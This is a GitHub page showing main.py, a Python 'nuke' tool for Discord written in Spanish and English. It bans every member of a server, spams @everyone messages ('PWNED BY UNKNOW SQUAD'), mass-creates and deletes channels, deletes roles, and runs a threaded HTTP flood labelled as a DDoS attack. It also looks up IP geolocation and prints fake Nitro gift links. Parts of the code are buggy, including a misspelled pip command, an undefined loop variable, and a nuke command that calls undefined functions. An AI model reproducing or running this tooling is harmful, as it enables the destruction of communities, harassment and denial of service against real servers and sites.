-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.py
371 lines (231 loc) · 9.85 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
try:
import discord
from discord.ext import commands
import colorama
from colorama import Fore
import pystyle
import random
import os
import time
import requests
import threading
import asyncio
from datetime import datetime
except ModuleNotFoundError:
os.system("pip intall discord")
os.system("pip install colorama")
os.system("pip install pystyle")
os.system("pip install requests")
os.system("cls")
art = f""" {Fore.BLUE}
_____ _____ _____ _________________ _____ _____ ____
___|\ \ |\ \ / /|/ \ ____|\ \ ____|\ \ | |
| |\ \ | \ \ / / |\______ ______// /\ \ / /\ \ | |
| | | || \____\/ / / \( / / )/ / / \ \ / / \ \ | |
| |/____/| \ | / / / ' | | ' | | | || | | || | ____
| || || \|___/ / / | | | | | || | | || | | |
| ||____|/ / / / / // |\ \ / /||\ \ / /|| | | |
|____| /____/ / /___// | \_____\/____/ || \_____\/____/ ||____|/____/|
| | |` | / |` | \ | || | / \ | || | /| | ||
|____| |_____|/ |____| \|____||____|/ \|____||____|/ |____|_____|/
\( )/ \( \( )/ \( )/ \( )/
' ' ' ' ' ' ' ' '
"""
print(art)
print("\n================================")
print(f"{Fore.RED} 1- Ban All")
print(f"{Fore.RED} 2- Fast Spam")
print(f"{Fore.RED} 3- Ip Information")
print(f"{Fore.RED} 4- DDoS attack")
print(f"{Fore.RED} 5- Fastest Channel creator")
print(f"{Fore.RED} 6- Fastest Channel Deleter")
print(f"{Fore.RED} 7- Role Deleter")
print(f"{Fore.RED} 8- Role Creator")
print(f"{Fore.RED} 9- Token information")
print(f"{Fore.RED} 10- Fake Nitro")
print(f"{Fore.RED} 99- Nuke server menu")
print(f"{Fore.RED} 0- Exit")
print(f"{Fore.CYAN}\n================================")
opc = input("$>>")
if opc == '':
exit()
if opc == '1':
os.system("cls")
token1 = input("Discord bot token: ")
prefix2 = input("Prefix")
bot = commands.Bot(command_prefix=prefix2, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !Ban")
@bot.command(name="ban")
async def ban(ctx):
await ctx.message.delete()
for member in ctx.guild.members:
try:
await member.ban()
except Exception as e:
print(f"Error {e}")
bot.run(token1)
if opc == '2':
TOKEN = input('Token: ')
prefix6 = input("Prefix: ")
bot = commands.Bot(command_prefix=prefix6, intents=discord.Intents.all())
cooldowns = {}
@bot.command(name="mass_message")
async def mass_message(ctx, args=None):
message = ctx.message
if message.author.id in cooldowns:
cooldown_expiration = cooldowns[message.author.id]
remaining_cooldown = (cooldown_expiration - datetime.now().timestamp()) / 1000
await message.author.send(f"Wait {remaining_cooldown:.1f} ")
return
cooldown_time = 300
cooldowns[message.author.id] = datetime.now().timestamp() + cooldown_time
await message.delete()
async def spam_channel(channel):
messages = ["""@everyone **PWNED BY UNKNOW SQUAD BRO**
Vete de esta mierda
leave leave """] * 20
await asyncio.gather(*[channel.send(msg) for msg in messages])
await asyncio.gather(*[spam_channel(channel) for channel in message.guild.channels if channel.type == discord.ChannelType.text])
print("Todos los canales han sido exitosamente spammeados.")
@bot.event
async def on_ready():
print(f'¡Conectado como {bot.user}!')
bot.run(TOKEN)
if opc == '3':
ip = input("IP: ")
api = f"https://ipinfo.io/{ip}"
response = requests.get(api)
if response.status_code == 200:
data = response.json()
print("Información de la IP:")
print("IP:", data.get('ip'))
print("Hostname:", data.get('hostname'))
print("Ciudad:", data.get('city'))
print("Región:", data.get('region'))
print("País:", data.get('country'))
print("Proveedor de servicio de Internet (ISP):", data.get('org'))
print("Latitud, Longitud:", data.get('loc'))
if opc == '4':
def dos(target):
while True:
try:
res = requests.get(target)
print("Request sent!")
except requests.exceptions.ConnectionError:
print(" (-) FAILDED")
threads = 20
url = input("URL>>")
try:
threads = int(input("Threads: "))
except ValueError:
exit("Cantidad de theards no valida!")
for _ in range(0, threads):
thr = threading.Thread(target=dos, args=(url,))
thr.start()
print(str(i + 1) + " DOS ATTACK STARTED")
if opc == '5':
token3 = input("Token: ")
prefix4 = input("Prefix: ")
name = input("Channels Name: ")
bot = commands.Bot(command_prefix=prefix4, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !channel")
@bot.command(name="channel")
async def channel(ctx):
await ctx.message.delete()
for _ in range(40):
delay = 0.1
await ctx.guild.create_text_channel(name)
await asyncio.sleep(delay)
print("Canal Creado!")
bot.run(token3)
if opc == '6':
token4 = input("Token: ")
prefix5 = input("Prefix: ")
bot = commands.Bot(command_prefix=prefix5, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !delete")
@bot.command(name="delete")
async def delete(ctx):
delay = 0.2
await ctx.message.delete()
for channel in ctx.guild.channels:
await channel.delete()
await asyncio.sleep(delay / 200)
print("Canal Borrado!")
bot.run(token4)
if opc == '7':
token5 = input("Token: ")
prefix7 = input("Prefix: ")
bot = commands.Bot(command_prefix=prefix7, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !role")
@bot.command(name="role")
async def role(ctx):
await ctx.message.delete()
for role in ctx.guild.roles:
await role.delete()
print("Rol Borrado!")
if opc == '8':
token6 = input("Token: ")
prefix8 = input("Prefix: ")
roles = input("Role name: ")
bot = commands.Bot(command_prefix=prefix8, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !role-create")
@bot.command(name="role-create")
async def role_create(ctx):
await ctx.message.delete()
await ctx.guild.create_role(name=roles)
print("Rol Creado!")
if opc == '9':
token7 = input("Token: ")
def token(url, token7):
print("""
Numero:{phone}
""".format(phone=url.json().get('phone', 'No phone number found')))
url = requests.get("https://discord.com/api/v9/users/@me")
token(url, "token7")
input("Enter para salir")
if opc == '10':
print("discord.gift/vhnuzE2YkNCZ7sfYHHKebKXB")
print("discord.gift/Udzwm3hrQECQBnEEFFCEwdSq")
if opc == '99':
os.system("cls")
print(f""" {Fore.GREEN}
__ __ __ __ __ __ ______ __ __ ______ __ __ __ __
/\ "-.\ \ /\ \/\ \ /\ \/ / /\ ___\ /\ "-./ \ /\ ___\ /\ "-.\ \ /\ \/\ \
\ \ \-. \ \ \ \_\ \ \ \ _"-. \ \ __\ \ \ \-./\ \ \ \ __\ \ \ \-. \ \ \ \_\ \
\ \_\\"\_\ \ \_____\ \ \_\ \_\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_\\"\_\ \ \_____\
\/_/ \/_/ \/_____/ \/_/\/_/ \/_____/ \/_/ \/_/ \/_____/ \/_/ \/_/ \/_____/
""")
print("\n================================")
print(f"{Fore.CYAN}!- Kill")
print("================================")
opc2 = input("$>>")
if opc2 == '!':
token8 = input("Token: ")
prefix9 = input("Prefix: ")
bot = commands.Bot(command_prefix=prefix9, intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{Fore.GREEN} Bot online!")
print("Run !nuke")
@bot.command(name="nuke")
async def nuke(ctx):
await ctx.message.delete()
await delete()
await channel()
await mass_message()
bot.run(token8)